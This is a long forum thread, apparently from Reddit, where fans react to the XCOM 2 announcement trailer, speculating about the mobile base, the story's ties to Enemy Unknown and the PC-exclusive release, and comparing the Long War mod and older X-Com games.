It makes great sense from a story perspective too, as a fixed location base would be easy to find for a well equipped and dug in superpower like the "Unified" seem to be. Move your base around and it becomes a guessing game for the enemy. I'm betting the dropship has or will have some sweet cloaking upgrades to avoid radar and visual locating. 

This time we are not going to be hunting UFOs, we will be the hunted! It's going to be interesting to see what they do with base building, and the long term advancement of your capabilities.

One idea that comes to mind is that you don't just have one carrier, that you could have a carrier in each region similar to how you'd have a base in each previously, and missions are carried out by whatever is on hand for that particular carrier. Specialization would be possible too, a science/engineering one, assault ones, etc, and you'd need to locate them carefully to let you respond. In the steam news, it says this carrier was an alien supply craft been captured and converted into mobile HQ. So no multiple carriers like you said I guess. Imagine capture missions where you hijack alien craft. Great mission type.  Yeah, from the sounds of it they're actually moving in the direction of taking other enemy ships. One for research, one for forging, etc. Then, you assemble your armada for late-game strikes.

That's speculation but I like the notion. That actually sounds really cool and it could end in some serious choices having to be made. What if two dropships were under siege, but you can only save one? Which do you pick and why?

Though I think it is more likely, that we will choose a single starting dropship (maybe from a few different types?). It doesn't seem logical, to choose a region in this, since our base is mobile and having multiple dropships could be tedious to manage, unless they do a complete overhaul of how the tech progression system works. &gt; That massive dropship is almost certainly your base in this game.

Confirmed on the Xcom website. &gt; Guide your strike force around the world, build popular support and expose the aliens' sinister plans.

Ooooh. So instead of defending countries against alien attacks, you could start with just a small base of operation, and gather help, troops, free countries from their overlord... Of course you'd have to defend what you've freed or captured.

Like EU, but starting from the point where you've lost :D &gt; They could be doing away with the base-building completely, or have you assign existing decks/bays in the dropship to certain functions instead of digging out the ground below your base, like you did in the old games.

According to the site you'll still be able to upgrade and build new stuff on your ship. It's interesting to see that they're building more on the ideas established in Enemy Within than on the original game's expansions. I was expecting them to continue to ramp up the stakes in future games by letting the player go on the offensive against alien home worlds, attacking Mars or whatever, but allowing aliens to integrate with humanity and keeping earth as the battlefield is a really interesting angle.

It looks as if we'll be spending as much time fighting humans as Aliens and it feels like the logical conclusion to the Exalt storyline. That giant flying XCOM base gives me the impression that we'll be the invading force this time around, rather than being on the defensive constantly, reacting to the enemies moves. I like that. Instead of starting with all of the countries and slowly losing them, you start with very little but work on regaining them over time.  Starting small does sound fun. One of my main complaints with XCOM was that there wasn't any way to regain lost territory. It didn't effect my enjoyment of the game, but it did feel like a bit of a missed opportunity. Long war fixed that, you can regain nations by taking out a alien base in a nation you lost. Long war is not a easy mod by any means though... If you can win the long war you probably won't lose countries in the original. But oh god is it a satisfying one.  Try the Long War mod. I did find it a real detriment. It made the game too much about finding and executing the right strategy so you're not dead from losing all countries. I wish I'd had more freedom to play at my own pace in my own style. XCOM is about minimizing loss, not avoiding it. You just pick which country you need the least.  Yeah, I like the idea of XCOM being reduced to some kind of resistance movement rather than the first line of defence for the entire planet. Long War fixed that. Enemy within was SUCH a solid expansion. I loved the regular XCOM game, and Enemy Within brought me more of my favorite things about it. I think its greatest success was adding new layers of combat and strategy over an already excellent system. The variety of new skills, tech, game modifiers, etc. made playing XCOM feel completely fresh again. I'm SO psyched to see where this game goes. The series feels like it's heading in a great direction. Those second wave options were a great idea, they added so many new ways of messing with the rules of the game. It sounds like you had a fairly similar experience with XCOM as me, did you by any chance try the Long War mod? There's mods? http://www.nexusmods.com/xcom/mods/88/?

http://www.reddit.com/r/LongWar101/ Awesome thank you.  Go for Long War. Playing it at the moment and vanilla pales by comparison on all accounts. Most of all difficulty. &gt;pales by comparison on all accounts

Strong disagree, it's a mess that veterans of the series praise just for not being as shallow as EU/EW. It's tedious and quickly gets boring. There isn't enough content to justify the extra length, so it gives the same mission over and over. Many of the new additions sound fun but in practice are just annoying and unrewarding. The devs throw random ideas into it in hopes that they will improve the game, disregarding playability; this philosophy puts Long War in a state of being perpetually unbalanced and bloated and unfinished. Reminds me of Minus, a mod for SSBB.

So vanilla is better despite being shallow and less difficult. It's a playable, finished game that isn't so tedious. Long war is still a different experience that some might appreciate though. I've played XCOM for 264 hours according to Steam.  I tried the Long War mod, I did not enjoy it.  It just made the game much, much more of a grind.  I depleted my patience very early and went back to the regular game. Agreed. I really love the original, and while I can respect why some people love the Long War mod, it really just turns the game into a RNG-y grind. The original was definitely too easy once you survive the early game, but IMHO the way to fix that isn't to just make a shitload of missions you can't possibly beat among numerous other kneecappers. Jake Solomon has said on a couple occasions that the series will go in the direction of XCOM Apocalypse rather than TFTD as far as story. The trailer definitely mirrors that statement. Regardless of the story or art style I loved Apocalypse.

Why?  Because punitive raids on the Cult.

Because deciding to use lots of high explosives and incendiary ammo when in a hostile organizations place.

Because sending 1 single flying invisible asshole with incendiary ammo to torch a slum that was hostile to me.  

To completely fucking leveling a hostile slum with my late game air units.

Raging at the local gravball team daring to assault my research base.

 Oh man what if the Cult of Sirius shows up again!
 Apoc was a drastically, drastically under-appreciated game. Needed about six more months of solid work to get all their ideas implemented, but was very interesting and fun regardless. I've only seen one or two interviews with Solomon, but he seemed like a really smart guy who was incredibly enthusiastic about the franchise. I hope he's still running the project for Firaxis. Good news! He's still creative director for the project. I'm confident we're in good hands. That's brilliant. Did you see that [interview he did with Julian Gollop](https://www.youtube.com/watch?v=z8zZsecTRfM) a few years ago? That felt like a real 'passing the torch' kind of moment. You can tell there's a lot of mutual respect between them both. Things couldn't have worked out better for Xcom fans. I hadn't. That was really cool. It was nice to see them both just talking up the other ones game. Huh, I got the impression that this game was effectively what happens if you had gotten the "bad end" in X-Com 1.  That statue suggested aliens uplifted humanity, not that we integrated them.   I am unbelievably excited for this. Love how the video played out similar to the way you actually move your squad and use cover in Xcom one. Looks like you are going to be a rebel faction fighting an oppressive human/alien collab government? Suggests it won't have the "shoot down UFO" aspect of the game if the guys flying the UFOs are running things on earth. But I'm sure there will be new gameplay ideas as well, so I'm psyched. Wouldn't surprised me, since the air battles were probably the least popular part of the game. I don't know anyone that actually liked them. I liked them in X-COM: UFO Defense, they were a lot less entertaining in the remake. There was a ton of tension sending fighters after unknown alien ships, maybe you were taking down a large, but relatively harmless research vessel. Or maybe the large vessel turns out to be a battlecruiser and your jet is now in a life-or-death struggle against an enemy that could toast your very expensive fighter in a single shot. Or maybe that battlecruiser is on a terror mission for a major city and it doesn't matter how suicidal it is to fight it with your primitive terrestial jets, you were forced to feed them into the maw of the beast to do whatever damage they can, so that hopefully at least one of them will bring that bastard down before it reaches a population center. 

Yes, there was little-to-no control over the air combat, but I enjoyed the tension of watching those fights play out. Making sure you had good coverage of the planet and setting up the flight plans manually gave a lot of the "feel" of the global nature of X-Com, which was a very useful contrast to the small-scale tactical combat on the ground. Ugh man, and the tension of seeing all these alien flight signatures zipping around, but you're too underequipped to engage all of them, and can't tell what kind of mission they're on, so you let some of them through and pick your fights...and then they land right on your base. Time for a base defense because you thought you could ignore that last ship. Oh, and your main squad is still returning from the last mission. Time for your raw recruits wearing overalls to try to find some of the leftover obsolete ballistic weapons sitting around the base to try to make a miracle happen.

________________

As for my thoughts this new sequel, I think the most important thing I want to see is loss. This is the essence of what makes this franchise memorable, being able to lose things of value along your journey. Most games give you a steady power growth ramp, but classic xcom allowed you to lose treasured heroes, expensive ships, funding countries, and even entire bases. If xcom is a guerilla force on the move in this sequel, I just hope they remember to put in lots of ways for players to lose valuable things along the way. Xenonaughts has what you are looking for. The air game is actually really fun once you get how it works. Plus the game itself is way more like the old school UFO defense No gh in Xenonauts but yes. They had a ton of good improvements/additions to the game and their air combat was definitely one of those improvements. The problem with the air game in Xenonauts is that it is incredibly abusable. You can take down some of the largest UFOs in the game with just a pair of base interceptors when you know how the AI works.

It needed an extra notch of difficulty. I finished Xenonaughts without ever doing one manual air combat session. It just didn't click with me. I always kept some old laser tanks and a few hover tanks in the store rooms just in case that main squad is out scenario ever happened. Right? That tier 1 grenade launcher still fucked shit *up*. The dudes may be wearing overalls, but they were all rocking heavy weapons with mad drone support. "We held the base sir! We also improved the ventilation for the machine shop and added skylights to the medbay!" &gt;There was a ton of tension sending fighters after unknown alien ships, maybe you were taking down a large, but relatively harmless research vessel. Or maybe the large vessel turns out to be a battlecruiser and your jet is now in a life-or-death struggle against an enemy that could toast your very expensive fighter in a single shot.

Weren't you be able to construct a radar or something that would let you know all the details about the ship? Yep, but there's a long period you go through before you get that upgrade, and even after you get it, it takes time to build up the funds to install that upgrade at your various sites around the globe given all the other things that also need funding. It was missing [one key feature](https://www.youtube.com/watch?v=WOdRt_c8nfY) from the original that made it awesome Funky.

I still haven't played any of the original games. I tried a bit of the first game but found it hard to ignore the clunky UI. And I've heard there's a lot of micromanaging (individually assigning ammo to every soldier and that sort of thing) that would really piss me off. You could try [OpenXCom](http://openxcom.org). IIRC it fixes having to re-arm troops each time and there's probably mods by now to alter the UI.

[EDIT]: Okay, can't see any UI mods on the main mod site. Never looked before, sorry, as I'm completely used to the UI.

[EDIT 2]: Booting it back up again, the options screen available before you start a game does have enhancements like improved TU/Pathing display and more informative screens. You also get an overlay whenever you site a new base that shows you radar coverage. Pick up Xenonauts. It's UFO Defense without that annoying level of micromanagement. I agree. They were pretty lame. Either add some real strategy and action to them or just get rid of them entirely. Maybe this time it's "shooting down pursuing government jets with your escort fighter so the rebel command ship can escape"?  They might also flip it around so that your dropships get intercepted from time to time. If you get shot down, you have to survive until a rescue ship arrives.  I really hope the UFO waiting game and RNG air battle is cut out. Needs to be old school / Xenonauts style where you actually control interceptions. And you can launch more than one interceptor at a time That was one thing I didn't like was cut from the original. If there's a battleship incoming and I don't have any Firestorm/Avenger yet but I do have Interceptors with Plasma Beam, I could send 5 of them at the same time at the battleship. Hold off engaging until all 5 are in range, then send all in. I might lose an Interceptor or two, but I will get the battleship down. XCOM is on the invading side this time so hopefully that means more control over when the missions happen. There was nothing more frustrating than getting 4 missions in a row right before your research project for new weapons finished.  I hope it's like Apocalypse. I hope, at least, it has the Cult of Sirius. Hey guys - FYI, I'll have a huge first-look feature going up tomorrow morning with a ton of details. On Wednesday we'll post a Rewind Theater video I did with Creative Director Jake Solomon and Lead Producer Garth DeAngelis, where we talk about everything you see in the trailer. And that's just the start! I've really enjoyed the direction IGN has been taking lately. Thanks for that. :) Thanks for saying so! Jake Solomon's PR campaign with the first XCom -- especially the commercial where he [tries to sell the game to customers in a Gamestop](https://www.youtube.com/watch?v=T1pyJxcETmc) -- got me interested in and subsequently sold me a copy when it came out. I'm interested in anything that guy has to say. Sure tease us today with the trailer and give us the first look tomorrow then follow up with an interview the day after.

I just really want to know more now! :) The best thing about following the development of the last X-Com was the Jake Solomon videos and interviews. The man is passionate as hell about X-Com. Months after Enemy Unknown was announced I heard him talk about it at the Firaxis panel at PAX East. I was much more enthusiastic about it after that as he showed he had a huge passion for it. He was able to convey that he wanted to modernize the game but he understood much of what was critical to it being an X-Com game. I'm curious how the sequel will be as there were lots of pieces they wanted to do but couldn't get the gameplay right or didn't have time to explore them for Enemy Unknown's release.

After seeing Enemy Unknown be so successful, I've been eagerly awaiting to see what they can do with a sequel. Awesome! The trailer looks good, but you really can't tell until you see some actual gameplay. We'll have that for you on our E3 Live Show! Any story details included in that first look? Is it a continuation of the ending from Xcom 1? We'll have an overview and Firaxis' reasoning for going in this direction, but no spoilers. Glad to see they're heading in new directions with their writing and exploring new options! This new rebel vibe they've got going on looks really intriguing. Yeah, that's one of the things I was hoping for, that they wouldn't just rest on their laurels comfortably, but feel free to make changes similar to you'd see between Civilization games. Early on at a Firaxis panel, Jake Solomon definitely talked about how they had many ideas but not enough time to work on them or flesh them out in time for Enemy Unknown. I'm sure they got some of those in and came up with more ideas. I also hope they continue with some of the trends they started in the expansion/DLC, like making the game feel more international with more varied maps and different accents (both Enemy Within and Slingshot had a bit of this, so they must be aware of that particular criticism) Agreed, I'm glad they're leaning a bit more into the story and plot. I wouldn't say the first game's plot was nonexistent, but it didn't really factor in to why I spent 100 hours playing it at all. Excited for more melee weapons.  My favorite part of Enemy Within was rocket punching aliens with the MEC Troopers. Also the little execution sequence when you KS'd something big to death. I just bought the Enemy Within expansion! I'll finish that out and then be ready for this one! :D since the game only comes out in november you will have enough time to start Long War too. Not just any aliens.

Sectopods. Wonder if we'll finally be able to recruit aliens this time, could be the one feature that brings a lot to the gameplay (different gameplay than with the regular dudes, having to use specific equipment, build specific quarters, etc...). Mutants were a lot of fun to play in Fallout Tactics. That'd be great. I enjoyed the X-Com Enemy Unknown multiplayer due to the diversity offered by having aliens on your team; if it could be part of standard gameplay mechanics, it'd be an interesting innovation. If you check the [website](http://xcom.com), most of the speculations here are confirmed:

* Alternate timeline where Earth surrendered to the aliens
* Refurbished alien ship as mobile base, which is upgradeable
* Control remnants of XCOM and expose secret intentions of the aliens

Also, there's a screenshot with a soldier carrying a sword as a secondary weapon. It doesnt list it as an alternative timeline, just that earth has surrendered to the aliens.  It sounds like its a continuation of the xcom plot assuming the "bad" ending.  Ah, so the game takes place after my first playthrough on classic where Thin Men systematically wipe out my entire squad. The ending for EU/EW had the Uber Ethereal say that they were failures and cast out of their society for being too weak or for failing to ascend. He also says that they're trying to prepare humanity for "what's coming" and when you kill him he says that humanity needs to be guided to be able to use their ability to it's full potential. 

The story will probably have the "actual" threat invade Earth and take over with a full on invasion rather than the experimentation that the previous invasion did.  "Ok, I've got some distance, heavy cover, and armor out the ass... I should be totally saf- *thin man headshot* - fuck. Doesn't have to be an alternate timeline.

They could follow the canon good ending of EU/EW, and just have the aliens redouble their efforts after that, and force the humans to surrender, since they now know what the humans are capable of. This is it, the whole thing (SPOILERS) was a test anyways. Humans were either good enough to be used or bad enough to be destroyed by a subset of the aliens. 

We proved our worth, so at least we got conquered instead of exterminated.  [Word of God](http://www.reddit.com/r/Xcom/comments/2mtvk9/apparently_the_volunteer_does_not_die_in_the/) says that the Volunteer who appears to sacrifice him/herself at the end of XCOM 1 actually survives. I'm sure that plays into it somehow. Maybe the Uber Ethereal planned to be defeated all along? This is so well done: I thought at first the Unification would be "yay, XCOM won, everyone's gotten together against the humanity-threatening" and at :40 when you see them sneaking through the alley, I thought "oh crap, we *lost*". I'll be interested to see how they square that w/the ending of the 1st (in that if the point of the alien invasion was to see if they could get us to a point we could resist a larger threat) -- does losing imply we didn't produce anyone, and thus are subjugated? Are there humans out on other planets performing terror missions on innocent plant peoples?

And I can't be the only person who, at ~1m in, saw them get behind those signs and said "No no no that's half-cover don't--" Legitimately shocked that they made it a PC Exclusive. I mean, while Enemy Unknown for me played the best on PC, it was surprisingly playable on consoles too. Seems like they're leaving money on the table. X-com:Enemy unknown sold 2.7M on Steam yet [flopped on consoles](http://forums.2k.com/showthread.php?182671-XCOM-sells-114k-on-consoles). I was one of the few that had it on xbox 360 then. I absolutely loved it, and finished the campaign. Got it on PC as well now though. Same here. After I played the 360 demo and felt how well it worked I picked it up right away So long they keep controller support on the PC version, I'm happy. They can keep the controller support, but only if they overhaul the UI when using a KB+mouse to make it way less controller-centric.  Their version of XCOM was clunky with the mouse and keyboard.  Menus in particular were a pretty big pain in the ass, and so was constantly confirming actions, or the way your hot bar along the bottom would *change* depending on if you moved or not (Rather than having them greyed out or what have you.) I actually find a pad much easier to use as it's less finicky when you're moving around multiple levels and the camera can't decide what level you're pointing at. Xcom is a great example of a game that works pretty well for more than one control method, being turn based and grid based there's little need for fast and precise. The middle mouse button adjusts the height, and I got used to using 1-0 on the keyboard for squad actions and Q/E (iirc) to change camera angles and all the other hotkeys to make things much faster. The gamepad control is not bad if you are playing slow though. That makes me very sad. Such a good game and it plays so well on console.  Also nothing like it on console which makes it so damn refreshing to play

 I guess strategy is pretty niche on the consoles.  Wow thats so sad :( I loved that game to death on Xbox. Long War is an incredible mod, basically a couple expansion packs rolled into one. But of course, can only mod PC version. &gt; Seems like they're leaving money on the table.

Seems like they know their target audience. XCOM had a good number of issues with its console releases  like the expansion being too large for them to release it as DLC, meaning they had to rerelease the game. I guess the did a cost-benefit analysis and decided that making a good PC game unrestrained by the limitations of consoles mattered more than covering a number of platforms. It's just weird that they went through the effort to put Enemy Unknown on pretty much anything that could run it and put the work in to put the expansion out on consoles, only to make the sequel an exclusive. It goes double for the fact that outside of payment, exclusives for games of this size usually don't happen to go along with traditional PC franchises like The Witcher and Diablo going to consoles. It's a curious decision I'm really interested in hearing the explanation for.  You used Diablo as an example of a non-exclusive.  That wasn't released for consoles for almost a year after it was released on PC.  They might end up taking that route with this. It's simple. It flopped, financially, on consoles.    
PC was another story. 
The core audience is there and the numbers confirmed it.  

Now they do not need to hold back because of consoles and can actually add a ton of stuff. Randomly generated maps for example and modding support. Which will make the game even more appealing for their target audience, which is on PC, simple as that. 
It sucks for the console players, but I'd rather have a good game than a game that gets hold back.  If Xcom gets randomly generated maps then 2K get my money the day they announce that.

I love Xcom EU and the expansion, but there are only so many times i can play on the same maps over and over and over again without losing some enthusiasm for it. They already confirmed it mate. So get your dosh ready. :D

&gt;
* New enemies: Evolved Sectoids, snake-lady Vipers, and Advent soldiers
* Stealth-infused tactics, including using cover for concealment and looting fallen enemies and allies
* A mobile base: a flying aircraft carrier called the Avenger
* Procedurally generated maps and the technology that powers them
* Mod support, including official mod tools and Steam Workshop integration
* One-on-one multiplayer By now you've probably heard about it, but the mod Long War adds dynamic spawns. That means every time you land you get to tackle the map from a different angle and approach encounters from new cover formations which definitely adds to the replayability. &gt; It's a curious decision I'm really interested in hearing the explanation for. 

I guess they wanted to test the market for turn based tactical games on consoles. Probably didn't make enough money in sales to justify the expense they went through to put it on consoles.  After all, it sure didn't sell. Plays great on the iPad as well. Hope they look into that down the road again, because that remains my go to activity for a long flight. This game does seem perfect for tablets and touch screens. Yeah, it plays quite well on tablets. Maybe the console versions didn't sell that well? Though they did port it to mobile as well. Or maybe they just aren't talking platforms yet.

It does seem odd though. 140k~ copies sold on console vs 2.7m on PC, it's a pretty logical decision to focus on PC 1 month in 1 region on consoles vs 32 months in every region on PC is hardly a fair comparison. Maybe it's just PC first and not exclusive?  Doesn't seem that way - ["And, later this week well go in-depth with Solomon and DeAngelis on the reasons behind the bold move to take XCOM from a multiplatform series to a PC exclusive, and how XCOM 2 will be tailored to take advantage of that single platforms strengths  followed by Firaxis exciting plans to support modders and their work."](http://uk.ign.com/articles/2015/06/01/xcom-2-announced-ign-first?watch=true&amp;utm_campaign=ign+main+twitter&amp;utm_source=twitter&amp;utm_medium=social)
 &gt;exciting plans to support modders and their work 
   
Sounds amazing already. INB4 steamworks mod store that they tried on Skyrim.  I wouldn't be surprised, but I wouldn't mind it as long as there's some level of curation and control instead of the "sit back, do nothing, rake in the money" approach that Valve tried.  
  
Plus, it will go a lot better if done in a brand new game that doesn't already have a well established fan base for modding.   Wasn't it like that at first? First PC, then down the road Tablets, Android, Console, Etc versions.

 PC and console came out the same time, IIRC. That's super disappointing for someone who never knew the series but bought both versions (EU &amp; EW) on PlayStation 3 and made a third purchase on iOS (iPad).

Everyone I know that played that game did it on "not-PC" and loved it. I'm sad to hear the average player didn't respond. I'd buy it on PS4 it a hot second. I've gone from uber-excited to bummed in two hours. Not that I resent them their decision - I'm sure they had their reasons - but I was one of those who discovered XCOM on 360 and became obsessed, so to be denied the sequel because of poor sales just feels immensely frustrating. 

So I guess that and the prospect of Witcher 3 mods mean that I should start saving pennies for a PC build... I just hope they don't ditch gamepad support. The last one played incredibly well on a gamepad. Okay, well, I would have preferred a straight up Apocalypse remake, because I love me some X-Com: Apocalypse, but it's still XCOM, and more XCOM is something that I desperately want pretty much all the time.  And XCOM: Underground or Rogue or whatever you want to call this is exciting.  One hopes it means they've added the option to pick up dropped weapons mid-combat again, because what kind of Resistance doesn't appropriate enemy weapons? It seems like a combo of UFO: Aftershock and Xcom Apoc. Didn't the alien weapons have some kind of failsafe built in in Enemy Unknown that stopped you from being able to grab them because they exploded? It seemed like it kept the early game hard and made it all the more sweet when you finally managed to research the alien weaponry for your own soldiers. &gt;Didn't the alien weapons have some kind of failsafe built in in Enemy Unknown that stopped you from being able to grab them because they exploded?

Yeah, the weapons exploded upon enemy death and the only way to recover them in tact was to stun the aliens and capture them alive. Even then you still had to research the weapons to be able to use them; but after that you could equip captured ones instead of having to build them. Yeah, its not as fun if you can get the best weapons on the first mission you play against it.  Yeah but in the *real* games, you could grab their guns, but still had to research them (very expensive) and you had almost no ammo. You'd get a few shots off and that was it. They were also dramatically overkill for the beginning of the game; you were better off just selling them. Glad to see another Apoc fan on here!  Damn that game was fun, and hard.  So much micro management!  and if you left it on real time... your squad fired all their ammo in the first 20 seconds of combat.  Still great times. I don't even know what to feel right now. So many emotions! Mostly excitement.

* Looks like they're keeping the 4 person base squad size. A little disappointed honestly, since the Long War mod shows just how much more fun and chaos you can have with a larger squad.

* On the other hand, a wider variety of friendly drones looks like fun.

* Is that a sword? THATS A FUCKING SWORD

* HOLY SHIT HELICARRIER WE SHIELD NOW BOIS

* Grr Exalt. I wonder if this new setting means a wider variety of mission types. An infiltration or hacking type mission would be cool.

* I'm not sure how they're doing the timeline here. It seems like the invasion was pretty much immediately successful, since the first game starts in 2015, which means that XCOM:EU isn't canon. 

* In fact, I'm wondering if this isn't just a completely different universe. The alien that got sworded looks like what the ethereals wanted sectoids to be. In the first game they canonically failed, becoming the little grey men we all know and shoot, but I'm wondering if here they succeeded. Wait, I saw an ethereal in the background posters. The mystery deepens!

* Snakemen are back...as women! I'm actually a little disappointed, since I never played the originals, so no nostalgia factor, but Thin Men are pretty iconic to me and this means they might not appear.

* I really, *really* hope they bring back MECs. Even if it's for the expansion. Gene troopers were cool and all, but punching aliens across the map was the highlight of my day.

* Looks like the four base classes are approximately the same. Heavy, sniper, ~~assault~~ FUCKING SWORDS, probably medic. 

I'm super looking forward to this. I'm hoping for new mission variety, a revamped class system, MECs, and more links back to the old game than were on display here. It'd be great if the old base team, Bradford Vahlen and Shen, were still around. Whatever happens, this is gonna be great.

Oh, and I can't wait until Beaglerush finds out about this.  I feel like it might be implying that the alliance likes to pretend the war over Earth never happened, and say it was a swift victory to discredit the rebels. I'm hoping XCOM:EU was canon. Very good point. It could also be a timeline where XCom didn't manage to fight bback before the invasion succeeded. But he said in the end "Welcome back, Commander". Doesnt this point out in a continuation? 

Say, XCom:EU stays canon, and the aliens came back later diplomatically (or with bigger guns), and humanity accepted a Unification for whatever reasons. &gt; In fact, I'm wondering if this isn't just a completely different universe. The alien that got sworded looks like what the ethereals wanted sectoids to be. In the first game they canonically failed, becoming the little grey men we all know and shoot, but I'm wondering if here they succeeded. Wait, I saw an ethereal in the background posters. The mystery deepens!

Needed to splice it with human DNA to make it work, hence all the abductions in EU, the "something sinister happening below the surface" in this game and the fact that UberSectoid has more human proportions and is sneakin around a corner instead of out in the open like the other OpFors.

Just my 2 cents, but the idea of aliens trying to create hybrid humanoids is really big in the UFO "abductee" community. Couldn't you upgrade to 6 after a while? Maybe they'll increase that number. Yes, but the base squad size in long war is 8 and upgradable to 12 Funny thing in the original te UFOpedia mentioned the amount of eggs the "Snakemen" could carry. So this implies at least some if not all the Snakemen in the original were female.

*edit* apoligis is says they are asexual http://ufopedia.csignal.org/ufopedia/069.png &gt; Looks like they're keeping the 4 person base squad size. A little disappointed honestly, since the Long War mod shows just how much more fun and chaos you can have with a larger squad.

Does the robot fella not count as a squad member? The wheely robots in EU counted, so the quadcopter probably does too. I would have thought it was a perk &gt;In fact, I'm wondering if this isn't just a completely different universe. The alien that got sworded looks like what the ethereals wanted sectoids to be. In the first game they canonically failed, becoming the little grey men we all know and shoot, but I'm wondering if here they succeeded.

Human-Sectoid hybrid, perhaps? Rather chilling thought. What someone else pointed out is it looks like it's continued off of a (probably quickly) lost game of EU. So basically losing the first game is cannon. Very interesting if true imo. I don't think that's the case because if you lose the game, the voice of the Council basically fires you, but the voice of the Council in this trailer can be heard welcoming you back. There's still the possibility that the Council realizes that XCOM is their only chance, even if it fucked up the first time around.

Or, the Council is still being controlled by aliens, and the Bald Guy is saying that sarcastically. Well, given that they were under mind control in the game over scene, I very much doubt that'll be the case. Maybe this is the aftermath of the fullscale invasion, the ones we fought were a large scout group and we won. The aliens knew what we had how we fought and invaded with full power. And we lost that war. It looks like this follows on from Enemy Within, and the aliens we see are gene modded humans or something, or Aliens that are being kept around for some reason. Looks good. I assume this carries on from the story of the first although I haven't completed it yet (I've developed to much of an emotional connection to the squad and refuse to let them die). It seems like it actually carries on from a lost game of enemy unknown.

So letting them die would be the canon thing to do. I didn't even realize that at first. Pretty funny considering I still haven't beat the damn original game in classic ironman. Now I'll just got ahead and take solace in that. &gt; It seems like it actually carries on from a lost game of enemy unknown.

I don't think this is the case.  After all, it would be pretty difficult to explain how they got a massive flying carrier-base out of the bad ending.

Personally, I think that you succeed in warding off the first invasion.  The nations of Earth then build a huge heli-carrier for X-Com in anticipation for a second invasion.

However, the second invasion doesn't come.  In fact, alien space craft show up in orbit asking to parley.  They claim that the previous aliens were a dangerous off-shoot of their species, like an extra-terrestrial ISIS.

Humanity is torn on what to do.  Some countries want to activate the X-Com project again, other countries want to give peace a chance.  Aliens exploit that wedge and establish a foothold on Earth.  Then, using a combination of tempting technology and mind control, they establish themselves world wide.  I believe its using the Bad Ending, which I believe its the fail state if you lose too many countries on the council, and [Spoiler](#s "baldie shuts down the XCom project and is being controlled by the aliens"). It would also make sense even if the Good ending was cannon. In EU it was strongly implied that the aliens were trying to do with humanity what they had with the other species they encountered (Mutons, Sectoids, Thin Men, ect.), modify and improve them to make them another component in their empire.

While obviously they never planned on XCOM [Spoiler](#s "Killing the Etherals and destroying the Temple Ship"), [Spoiler](#s "the dialogue on the Temple Ship mission seems to imply that by having a psionicly powerful operative XCOM had produced what the aliens wanted, a super soldier").

Despite the setbacks suffered by the aliens in EU under the Good ending, all those ships and aliens came from somewhere. Now that they know we have what they want, it's entirely likely they would redouble their efforts on Earth. This time with the goal of subjugating humanity instead of just [Spoiler](#s "launching terror attacks to assess the true limits of human capability"). This seems most likely, to my mind. Also, great work with the spoiler tags! redacted all the important bits for those poor souls who haven't experienced the glory that is XCOM: EU/EW I'm not so certain about that.

It looks like it follows the tone of the good ending.  In it you learn that [Spoiler](#s "Humanity has passed all of the aliens' tests and now they want to help us reach our potential.  The statue of aliens pulling us up, and the gene-tech improvements follow this tone.")

I believe that if it followed the Bad Ending then [Spoiler](#s "That the Xcom project equipment and staff would be taken by the aliens, and used for their next invasion")

EDIT: Apparently /r/Games uses different encoding for their spoilers then the other subreddits I frequent. I have now fixed my spoiler encodings. [deleted] [deleted] [deleted] Seems more like the aliens were beaten back and had to try a new angle to subverting humanity.  In the original they weren't about conquering and managing the populace so much as they were "kill everything and genetically modify/enslave the rest."  Looks like this game has people wandering around malls.  Guessing between last game and this the aliens took a kindler, gentler approach to human subversion. Only problem with this theory is that it would require the governments to work alongside the aliens, which Good Ending requires you to keep a unified front against them. They still could've used genetic manipulation and enslavement once they've subverted the government in Bad Ending though.  Yeah all your research just appears to suggest that, except for the Ethereals, all of the aliens exist exclusively to make war.  They're all stripped down in to combat machines and just fight fight kill kill.  They don't have like, propaghanda posters and people going out on dates at night.


My thought is that after losing, the aliens came back a couple of years later saying "now we want peace" and offering crazy technology, which eventually led to subversion.
 [deleted] [deleted] This is great. Love me some XCOM. 

I hope they change the title at some point though. Is "XCOM 2" seriously the best they could come up with? It'd be hilarious if they called it XCOM: Genesis, since it almost looks like an attempt to resurrect the cancelled original-series game of the same name, which IIRC would have seen you freeing an Earth that was under alien control while operating from an orbiting super-ship. Heck, that might actually be the case - Solomon *is* a major X-Com series fanboy, and I hear he's in charge of this game too. Wouldn't be too surprising considering Enemy Unknown was named after the first game in the series anyway.

Although "Genesis" is pretty generic as far as sequel names go. Awesome. I find myself coming back to XCOM: Enemy Within over and over again. And that's despite a lack of diversity in the enemies, weapons, gameplay, and strategy. So this looks really interesting. Hope they keep the model of resource and research management along with the great tactical gameplay and just build on the solid foundation. If you are on PC have you tried the Long War mod? It does a decent job at making the game deeper as well as ratcheting up the difficulty. Been waiting for them to settle down before paying it. Every patch wildly fucks the balance. Once they are done adding new features, I'll start. Long War is amazing. I love feeling an actual feeling of tension and danger for all my troops. I'm on OSX for the most part and installing the patch seems to be either really difficult or impossible depending on who you ask. I have messed around with it a bit in Bootcamp though. I'll be looking out for this one. The initial concept looks promising but the real meat will be how they handle gameplay.

After one campaign of Enemy Within, I was kinda done with the game. It provided me with over 100 hours of gameplay so I got my money's worth but I don't think I would buy another expansion. 

If they remix the formula to feel a bit different and make good changes to the gameplay then I'm onboard though. Seems pretty awesome and looks like they are taking some risks(melee, more futuristic and x-com now appears to be a rebel group meaning either the aliens won or the engineer old man was right to be scared of what was going to happen to humanity with all the new alien technology). 

It also looks like they reduced the whole "gears of war" style of the male x-com characters in the game, which is great since it looked weird as hell specially since the other male characters in the game that weren't soldiers looked normal, it's almost like the male soldiers from x-com were from a different species. I'm so glad this is the sequel I wanted and not the sequel to that other XCOM game, Bureau was it? Which is what I assumed from the title because it didn't have some sort of subtitle. I'm really hoping they adopt a lot of the ideas from the long war mod, or at least allow easier modding. Did they say what engine they are using?  From the press release:

&gt; XCOM 2 will introduce gameplay features such as procedurally-generated levels, which will make each experience unique to the player, as well as offer a much deeper level of modding support. Additionally, XCOM 2 will offer a variety of new content including five updated soldier classes, increased soldier customization, more alien and enemy types, evolved tactical combat and more. 


Looks like they were taking notes from the success of Long War. I'd really love to see something like Massive Chalice style cross-classing. An Assault takes a level in Medic, and suddenly, you've got yourself a Shocktrooper. I doubt it'll happen, because interesting multiclassing is really, really hard to design and balance, but I've been waiting for someone to take on and usurp Final Fantasy Tactics for a really long time. Not sure how I feel about the new setting, but it will be interesting to learn how they've changed the gameplay. Shooting down UFOs and researching alien artifacts doesn't really make sense anymore. Procedurally generated maps and modding support sounds great though. Please follow the subreddit rules, everyone. We've already removed over ~~50~~ 110 low effort comments that were posted only to be funny (jokes/memes) or other types of off-topic comments (XCOM quotes/puns, personal attacks, derailing discussion etc). 

